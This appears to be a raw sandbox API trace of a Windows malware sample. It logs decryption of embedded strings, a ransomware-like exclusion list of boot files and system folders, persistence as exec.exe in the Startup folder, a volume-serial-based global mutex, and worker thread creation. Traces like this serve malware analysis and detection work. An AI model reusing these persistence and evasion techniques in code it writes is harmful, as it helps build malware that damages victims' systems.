[0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016eb8 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017a80 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016ea0 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017698 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016ed0 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016da8 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5560 | out: hHeap=0x1db0000) returned 1 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xa4) returned 0x1db5560 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x62) returned 0x1db5610 [0109.102] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db5610, Size=0xc2) returned 0x1db5610 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016ed0 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xb40) returned 0x1db9650 [0109.102] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4e4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f54c | out: phKey=0x43f54c*=0x29bf60) returned 1 [0109.102] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f534, dwFlags=0x0) returned 1 [0109.102] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9650, pdwDataLen=0x43f500 | out: pbData=0x1db9650, pdwDataLen=0x43f500) returned 1 [0109.102] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10) returned 0x3016ea0 [0109.102] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f544 | out: phKey=0x43f544*=0x29bf60) returned 1 [0109.102] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f52c, dwFlags=0x0) returned 1 [0109.102] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3016ea0, pdwDataLen=0x43f4f8 | out: pbData=0x3016ea0, pdwDataLen=0x43f4f8) returned 1 [0109.102] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db56e0 [0109.102] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f51c | out: phKey=0x43f51c*=0x29bf60) returned 1 [0109.102] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f504, dwFlags=0x0) returned 1 [0109.102] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db56e0, pdwDataLen=0x43f4d0 | out: pbData=0x1db56e0, pdwDataLen=0x43f4d0) returned 1 [0109.102] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x84) returned 0x1dba1b0 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x84) returned 0x1dba360 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5778 [0109.102] CryptImportKey (in: hProv=0x254d70, pbData=0x43f48c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f4f4 | out: phKey=0x43f4f4*=0x29bf60) returned 1 [0109.102] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f4dc, dwFlags=0x0) returned 1 [0109.102] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x43f4a8 | out: pbData=0x1db5778, pdwDataLen=0x43f4a8) returned 1 [0109.102] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0109.102] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x1dba1b0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1dba360 | out: hHeap=0x1db0000) returned 1 [0109.102] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db56e0 | out: hHeap=0x1db0000) returned 1 [0109.102] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x60) returned 0x1db56e0 [0109.102] CryptImportKey (in: hProv=0x254d70, pbData=0x43f4b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f518 | out: phKey=0x43f518*=0x29bf60) returned 1 [0109.103] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f500, dwFlags=0x0) returned 1 [0109.103] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db56e0, pdwDataLen=0x43f4cc | out: pbData=0x1db56e0, pdwDataLen=0x43f4cc) returned 1 [0109.103] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.103] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x5c) returned 0x1db5748 [0109.103] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x5c) returned 0x1db57b0 [0109.103] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5818 [0109.103] CryptImportKey (in: hProv=0x254d70, pbData=0x43f488, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f4f0 | out: phKey=0x43f4f0*=0x29bf60) returned 1 [0109.103] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f4d8, dwFlags=0x0) returned 1 [0109.103] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5818, pdwDataLen=0x43f4a4 | out: pbData=0x1db5818, pdwDataLen=0x43f4a4) returned 1 [0109.103] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.103] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5818 | out: hHeap=0x1db0000) returned 1 [0109.103] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0x1db5748, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0109.103] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db57b0 | out: hHeap=0x1db0000) returned 1 [0109.103] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db56e0 | out: hHeap=0x1db0000) returned 1 [0109.103] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x3017a80 [0109.103] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20a) returned 0x3017c98 [0109.103] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3017c98, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0109.103] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3017c98 | out: hHeap=0x1db0000) returned 1 [0109.103] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0xb38) returned 0x1dbcce8 [0109.103] GetLastError () returned 0x0 [0109.103] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1dba360, Size=0x98) returned 0x1db57b0 [0109.103] GetLastError () returned 0x0 [0109.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831edc, lpParameter=0x43f6e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0109.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831da2, lpParameter=0x43f700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x22c [0109.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831958, lpParameter=0x43f6e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0109.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831a4b, lpParameter=0x43f6e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x238 [0109.106] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0xffffffff) returned 0x0 [0124.875] WaitForMultipleObjects (nCount=0x4, lpHandles=0x43f710*=0x8c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 91 os_tid = 0x5ec [0103.728] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1470 [0103.728] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x257438) returned 1 [0103.728] CryptSetKeyParam (hKey=0x257438, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0103.728] CryptDecrypt (in: hKey=0x257438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x200faf4 | out: pbData=0x1db1470, pdwDataLen=0x200faf4) returned 1 [0103.728] CryptDestroyKey (hKey=0x257438) returned 1 [0103.728] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1498 [0103.728] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db14c0 [0103.728] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db14e8 [0103.728] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x257438) returned 1 [0103.728] CryptSetKeyParam (hKey=0x257438, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0103.728] CryptDecrypt (in: hKey=0x257438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db14e8, pdwDataLen=0x200facc | out: pbData=0x1db14e8, pdwDataLen=0x200facc) returned 1 [0103.728] CryptDestroyKey (hKey=0x257438) returned 1 [0103.728] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14e8 | out: hHeap=0x1db0000) returned 1 [0103.728] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.728] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14c0 | out: hHeap=0x1db0000) returned 1 [0103.728] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.728] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.728] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1498 | out: hHeap=0x1db0000) returned 1 [0103.728] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1470 [0103.729] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x257438) returned 1 [0103.729] CryptSetKeyParam (hKey=0x257438, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0103.729] CryptDecrypt (in: hKey=0x257438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x200fb28 | out: pbData=0x1db1470, pdwDataLen=0x200fb28) returned 1 [0103.729] CryptDestroyKey (hKey=0x257438) returned 1 [0103.729] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db14b8 [0103.729] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0103.729] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x90 [0103.729] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x0 [0103.729] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.729] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14b8 | out: hHeap=0x1db0000) returned 1 [0103.729] ReleaseMutex (hMutex=0x90) returned 1 [0103.729] CloseHandle (hObject=0x90) returned 1 [0103.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831f44, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x90 [0103.730] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1470 [0103.730] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x257438) returned 1 [0103.730] CryptSetKeyParam (hKey=0x257438, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0103.730] CryptDecrypt (in: hKey=0x257438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x200faf4 | out: pbData=0x1db1470, pdwDataLen=0x200faf4) returned 1 [0103.730] CryptDestroyKey (hKey=0x257438) returned 1 [0103.730] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1498 [0103.730] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db14c0 [0103.730] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db14e8 [0103.730] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x257438) returned 1 [0103.730] CryptSetKeyParam (hKey=0x257438, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0103.730] CryptDecrypt (in: hKey=0x257438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db14e8, pdwDataLen=0x200facc | out: pbData=0x1db14e8, pdwDataLen=0x200facc) returned 1 [0103.730] CryptDestroyKey (hKey=0x257438) returned 1 [0103.730] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14e8 | out: hHeap=0x1db0000) returned 1 [0103.730] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.730] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14c0 | out: hHeap=0x1db0000) returned 1 [0103.730] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.730] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.731] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1498 | out: hHeap=0x1db0000) returned 1 [0103.731] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1470 [0103.731] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x257438) returned 1 [0103.731] CryptSetKeyParam (hKey=0x257438, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0103.731] CryptDecrypt (in: hKey=0x257438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x200fb28 | out: pbData=0x1db1470, pdwDataLen=0x200fb28) returned 1 [0103.731] CryptDestroyKey (hKey=0x257438) returned 1 [0103.731] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db14b8 [0103.731] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0103.731] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x94 [0103.731] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x0 [0103.731] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.731] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14b8 | out: hHeap=0x1db0000) returned 1 [0103.731] ReleaseMutex (hMutex=0x94) returned 1 [0103.731] CloseHandle (hObject=0x94) returned 1 [0103.731] Sleep (dwMilliseconds=0x3e8) [0105.156] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db16a0 [0105.156] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x283fa8) returned 1 [0105.156] CryptSetKeyParam (hKey=0x283fa8, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0105.156] CryptDecrypt (in: hKey=0x283fa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200faf4 | out: pbData=0x1db16a0, pdwDataLen=0x200faf4) returned 1 [0105.156] CryptDestroyKey (hKey=0x283fa8) returned 1 [0105.156] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db16c8 [0105.156] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16f0 [0105.156] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0105.156] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x25f320) returned 1 [0105.156] CryptSetKeyParam (hKey=0x25f320, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0105.157] CryptDecrypt (in: hKey=0x25f320, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200facc | out: pbData=0x1db54e8, pdwDataLen=0x200facc) returned 1 [0105.157] CryptDestroyKey (hKey=0x25f320) returned 1 [0105.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0105.157] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db16c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0105.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16f0 | out: hHeap=0x1db0000) returned 1 [0105.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0105.157] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0105.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16c8 | out: hHeap=0x1db0000) returned 1 [0105.157] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db16a0 [0105.157] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x25f320) returned 1 [0105.157] CryptSetKeyParam (hKey=0x25f320, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0105.157] CryptDecrypt (in: hKey=0x25f320, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200fb28 | out: pbData=0x1db16a0, pdwDataLen=0x200fb28) returned 1 [0105.157] CryptDestroyKey (hKey=0x25f320) returned 1 [0105.157] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16e8 [0105.157] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0105.157] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x158 [0105.157] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0x0) returned 0x0 [0105.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0105.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16e8 | out: hHeap=0x1db0000) returned 1 [0105.157] ReleaseMutex (hMutex=0x158) returned 1 [0105.157] CloseHandle (hObject=0x158) returned 1 [0105.157] Sleep (dwMilliseconds=0x3e8) [0106.239] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db16a0 [0106.239] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29bf60) returned 1 [0106.239] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0106.239] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200faf4 | out: pbData=0x1db16a0, pdwDataLen=0x200faf4) returned 1 [0106.239] CryptDestroyKey (hKey=0x29bf60) returned 1 [0106.239] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db16c8 [0106.239] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16f0 [0106.239] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0106.239] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29bf60) returned 1 [0106.239] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0106.239] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200facc | out: pbData=0x1db54e8, pdwDataLen=0x200facc) returned 1 [0106.239] CryptDestroyKey (hKey=0x29bf60) returned 1 [0106.239] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0106.239] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db16c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0106.239] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16f0 | out: hHeap=0x1db0000) returned 1 [0106.239] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0106.239] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0106.239] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16c8 | out: hHeap=0x1db0000) returned 1 [0106.239] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db16a0 [0106.239] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29bf60) returned 1 [0106.240] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0106.240] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200fb28 | out: pbData=0x1db16a0, pdwDataLen=0x200fb28) returned 1 [0106.240] CryptDestroyKey (hKey=0x29bf60) returned 1 [0106.240] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16e8 [0106.240] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0106.240] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x21c [0106.240] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x0 [0106.240] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0106.240] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16e8 | out: hHeap=0x1db0000) returned 1 [0106.240] ReleaseMutex (hMutex=0x21c) returned 1 [0106.240] CloseHandle (hObject=0x21c) returned 1 [0106.240] Sleep (dwMilliseconds=0x3e8) [0107.322] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db16a0 [0107.322] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29bf60) returned 1 [0107.322] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0107.322] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x200faf4 | out: pbData=0x1db16a0, pdwDataLen=0x200faf4) returned 1 [0107.322] CryptDestroyKey (hKey=0x29bf60) returned 1 [0107.322] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db16c8 [0107.322] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16f0 [0107.322] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0107.322] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29bf60) returned 1 [0107.322] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0107.322] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200facc | out: pbData=0x1db54e8, pdwDataLen=0x200facc) returned 1 [0107.322] CryptDestroyKey (hKey=0x29bf60) returned 1 [0107.322] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0107.322] 